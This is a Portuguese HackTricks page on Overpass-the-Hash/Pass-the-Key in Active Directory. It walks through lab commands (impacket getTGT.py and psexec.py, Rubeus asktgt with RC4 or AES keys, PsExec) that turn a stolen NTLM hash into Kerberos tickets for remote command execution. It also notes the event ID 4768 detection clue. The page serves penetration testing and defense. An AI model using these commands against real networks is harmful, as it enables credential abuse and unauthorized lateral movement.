hacktricks/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md

5.1 KiB
Raw Blame History

Over Pass the Hash/Pass the Key

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Overpass The Hash/Pass The Key (PTK)

Este ataque tem como objetivo usar o hash NTLM do usuário ou chaves AES para solicitar tickets Kerberos, como uma alternativa ao comum Pass The Hash sobre o protocolo NTLM. Portanto, isso pode ser especialmente útil em redes onde o protocolo NTLM está desativado e apenas Kerberos é permitido como protocolo de autenticação.

Para realizar esse ataque, é necessário o hash NTLM (ou senha) da conta de usuário alvo. Assim, uma vez obtido o hash do usuário, um TGT pode ser solicitado para essa conta. Por fim, é possível acessar qualquer serviço ou máquina onde a conta de usuário tenha permissões.

python getTGT.py jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass

Você pode especificar -aesKey [chave AES] para especificar o uso do AES256.
Você também pode usar o ticket com outras ferramentas como: smbexec.py ou wmiexec.py

Problemas possíveis:

  • PyAsn1Error(NamedTypes can cast only scalar values,) : Resolvido atualizando o impacket para a versão mais recente.
  • KDC cant found the name : Resolvido usando o nome do host em vez do endereço IP, pois não foi reconhecido pelo Kerberos KDC.
.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt
.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd

Este tipo de ataque é semelhante ao Pass the Key, mas em vez de usar hashes para solicitar um ticket, o próprio ticket é roubado e usado para autenticar-se como seu proprietário.

{% hint style="warning" %} Quando um TGT é solicitado, o evento 4768: A Kerberos authentication ticket (TGT) was requested é gerado. Você pode ver a partir da saída acima que o KeyType é RC4-HMAC (0x17), mas o tipo padrão para o Windows agora é AES256 (0x12). {% endhint %}

.\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:HASH /nowrap /opsec

Referências

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥